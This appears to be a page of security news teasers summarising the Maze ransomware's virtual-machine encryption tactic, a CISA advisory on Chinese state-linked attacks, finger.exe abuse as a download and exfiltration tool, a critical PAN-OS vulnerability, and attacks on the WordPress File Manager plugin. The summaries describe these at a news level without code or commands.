The Maze ransomware operators have adopted a tactic previously used by the Ragnar Locker gang; to encrypt a computer from within a virtual machine.
In May, we previously reported that Ragnar Locker was seen encrypting files through VirtualBox Windows XP virtual machines to bypass security software on the host. The virtual machine would mount a host’s drives as remote shares and then run the ransomware in the virtual machine to encrypt the share’s files.
As the virtual machine is not running any security software and is mounting the host’s drives, the host’s security software could not detect the malware and block it.
Read more »
The US Cybersecurity and Infrastructure Security Agency (CISA) issued a new advisory on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities.
“CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People’s Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,” the cybersecurity agency said.
Over the past 12 months, the victims were identified through sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. Read more »
The list of native executables in Windows that can download or run malicious code keeps growing as another one has been reported recently.
These are known as living-off-the-land binaries (LoLBins) and can help attackers bypass security controls to fetch malware without triggering a security alert on the system.
Works for download and exfil
The latest addition is finger.exe, a command that ships with Windows to retrieve information about users on remote computers running the Finger service or daemon. Communication is carried via the Name/Finger network communication protocol.
Security researcher John Page discovered that the Microsoft Windows TCPIP Finger command can also function as a file downloader and a makeshift command and control (C3) server that can serve for sending commands and exfiltrating data. Read more »
Palo Alto Networks has fixed a new critical vulnerability affecting multiple versions of PAN-OS, the operating system affecting its next-generation firewalls.
The issue received the identification number CVE-2020-2040 and has a severity score of 9.8 out of 10 and requires no user interaction. An unauthenticated attacker can exploit it by sending a malicious request to specific interfaces.
Code execution potential
In an advisory updated today, the company disclosed that the vulnerability was discovered during an internal security review by Yamata Li, a member of its Threat Research Team.
The same researcher is credited for finding another critical-severity flaw in PAN-OS (command injection CVE-2020-2034) that allows executing arbitrary commands with root privileges and without the need to authenticate.
Read more »
Attackers who are actively exploiting a critical remote code execution flaw affecting over 600,000 of WordPress sites running vulnerable File Manager plugin versions have also been seen protecting the sites they compromise from other threat actors’ attacks.
The critical vulnerability allows unauthenticated attackers to upload malicious PHP files and execute arbitrary code following successful exploitation [1, 2, 3]. File Manager’s dev team addressed the flaw with the release of File Manager 6.9.
Even though the flaw was patched within hours after the devs were informed by Seravo’s on-call security officer Ville Korhonen who discovered the zero-day flaw and the ongoing attacks trying to exploit it, researchers with WordPress security firm Defiant spotted more than 1.7 million sites being probed by threat actors between September 1st and September 3rd.
In an updated report published today, Defiant threat analyst Ram Gall says that the threat actors haven’t stopped their siege, with the total number of WordPress sites being targeted going up to 2.6 million. Read more »